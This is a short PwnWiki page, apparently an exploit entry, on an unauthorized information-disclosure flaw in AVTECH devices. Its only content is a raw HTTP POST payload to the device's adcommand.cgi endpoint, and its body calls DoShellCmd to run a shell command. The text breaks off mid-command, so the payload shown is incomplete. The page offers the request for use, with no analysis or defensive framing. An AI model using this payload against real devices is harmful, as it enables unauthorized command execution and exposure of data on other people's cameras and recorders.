AVTECH 未授權信息洩露漏洞

From PwnWiki
Revision as of 16:59, 6 May 2021 by Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,appl...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Payload

POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 23

DoShellCmd "strCmd=expr